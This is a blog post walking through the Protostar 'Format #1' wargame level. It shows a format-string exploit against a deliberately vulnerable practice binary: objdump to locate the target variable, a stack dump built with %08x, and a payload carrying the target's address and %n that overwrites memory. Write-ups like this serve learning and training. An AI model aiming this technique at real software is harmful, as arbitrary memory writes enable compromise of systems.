Monday, December 22, 2014

Protostar - Format #1

About:

This level shows how format strings can be used to modify arbitrary memory locations. (link)


Source Code:



Solution:

To me, this was one of the most mind-blowing challenges so far. It's much less complicated than some others, but I was completely new to format string exploits and the thought that you could write to memory with a printf call still seems bizarre...

To start with, we need to find the addresses of the global variable target.

user@protostar:/opt/protostar/bin$ objdump -t ./format1 | grep "target"
08049638 g     O .bss    00000004              target



Now we need to figure out how to get printf to write to that address.

We can pass that address in at the beginning of our argument, but we still need to figure out a way for the printf to use that address when it decides where to write.

 First let's run it once with "AAAA" at the beginning, and exhaustively print values off the stack until we find our AAAA being printed out:

user@protostar:/opt/protostar/bin$ /opt/protostar/bin/format1 `python -c "print 'AAAAAAAA' +'%08x.'*150"`
AAAAAAAA0804960c.bffff4b8.08048469.b7fd8304.b7fd7ff4.bffff4b8.08048435.bffff699.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffff538.b7eadc76.00000002.bffff564.bffff570.b7fe1848.bffff520.ffffffff.b7ffeff4.0804824d.00000001.bffff520.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffff538.72364b5a.5867bd4a.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffff564.08048450.08048440.b7ff1040.bffff55c.b7fff8f8.00000002.bffff67e.bffff699.00000000.bffff990.bffff99e.bffff9b2.bffff9d2.bffff9e5.bffff9ef.bffffedf.bfffff1d.bfffff31.bfffff48.bfffff59.bfffff61.bfffff71.bfffff7e.bfffffae.bfffffcb.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.1fabfbff.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffff65b.0000001f.bfffffe1.0000000f.bffff66b.00000000.00000000.00000000.07000000.e5da79a0.c012c6ef.fffbc1f1.698c2496.00363836.00000000.00000000.00000000.6f2f0000.702f7470.6f746f72.72617473.6e69622f.726f662f.3174616d.41414100.41414141.38302541.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.

There it is at the end!

Now we have to make it so that the AAAA is at the very end. We can then replace it with the address of target and replace the %x with a %n (this will make the printf write to that address).

user@protostar:/opt/protostar/bin$ /opt/protostar/bin/format1 `python -c "print '\x38\x96\x04\x08BBB' +'%08x.'*131"`%08x.%08x
8BBB0804960c.bffff518.08048469.b7fd8304.b7fd7ff4.bffff518.08048435.bffff6f0.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffff598.b7eadc76.00000002.bffff5c4.bffff5d0.b7fe1848.bffff580.ffffffff.b7ffeff4.0804824d.00000001.bffff580.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffff598.16ec7b87.3cbe4d97.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffff5c4.08048450.08048440.b7ff1040.bffff5bc.b7fff8f8.00000002.bffff6d5.bffff6f0.00000000.bffff990.bffff99e.bffff9b2.bffff9d2.bffff9e5.bffff9ef.bffffedf.bfffff1d.bfffff31.bfffff48.bfffff59.bfffff61.bfffff71.bfffff7e.bfffffae.bfffffcb.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.1fabfbff.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffff6bb.0000001f.bfffffe1.0000000f.bffff6cb.00000000.00000000.00000000.b5000000.1d9f7eda.d47c7483.0189c161.6977da08.00363836.00000000.706f2f00.72702f74.736f746f.2f726174.2f6e6962.6d726f66.00317461.08049638.25424242



You can see everything's lined up here to where if we replace the 2nd to last %08x with a %n, we'll trigger a write to the address of target.

$ /opt/protostar/bin/format1 `python -c "print '\x38\x96\x04\x08BBB' +'%08x.'*131"`%08n.%08x
 8BBB0804960c.bffff518.08048469.b7fd8304.b7fd7ff4.bffff518.08048435.bffff6f0.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffff598.b7eadc76.00000002.bffff5c4.bffff5d0.b7fe1848.bffff580.ffffffff.b7ffeff4.0804824d.00000001.bffff580.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffff598.5152bf8f.7b00899f.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffff5c4.08048450.08048440.b7ff1040.bffff5bc.b7fff8f8.00000002.bffff6d5.bffff6f0.00000000.bffff990.bffff99e.bffff9b2.bffff9d2.bffff9e5.bffff9ef.bffffedf.bfffff1d.bfffff31.bfffff48.bfffff59.bfffff61.bfffff71.bfffff7e.bfffffae.bfffffcb.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.1fabfbff.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffff6bb.0000001f.bfffffe1.0000000f.bffff6cb.00000000.00000000.00000000.da000000.7f46b895.b978575c.a43fafdc.694ce653.00363836.00000000.706f2f00.72702f74.736f746f.2f726174.2f6e6962.6d726f66.00317461..25424242
you have modified the target :)

We're done!



1 comment: